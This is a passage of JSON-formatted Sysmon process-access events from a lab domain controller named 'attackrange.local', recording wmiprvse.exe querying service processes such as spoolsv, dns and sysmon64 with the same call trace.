4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5290,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001073B90200}\r\nTargetProcessId: 2900\r\nTargetImage: C:\\Windows\\System32\\spoolsv.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001073B90200}","TargetProcessId":"2900","TargetImage":"C:\\Windows\\System32\\spoolsv.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5291,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-00106CBC0200}\r\nTargetProcessId: 2744\r\nTargetImage: C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-00106CBC0200}","TargetProcessId":"2744","TargetImage":"C:\\Program Files\\Amazon\\SSM\\amazon-ssm-agent.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5292,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001087BC0200}\r\nTargetProcessId: 2888\r\nTargetImage: C:\\Windows\\system32\\dns.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001087BC0200}","TargetProcessId":"2888","TargetImage":"C:\\Windows\\system32\\dns.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5293,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-00108BBC0200}\r\nTargetProcessId: 2884\r\nTargetImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-00108BBC0200}","TargetProcessId":"2884","TargetImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5294,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5295,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010BFBC0200}\r\nTargetProcessId: 2856\r\nTargetImage: C:\\Windows\\System32\\ismserv.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010BFBC0200}","TargetProcessId":"2856","TargetImage":"C:\\Windows\\System32\\ismserv.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5296,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.127\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001054BF0200}\r\nTargetProcessId: 2384\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.127","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001054BF0200}","TargetProcessId":"2384","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\S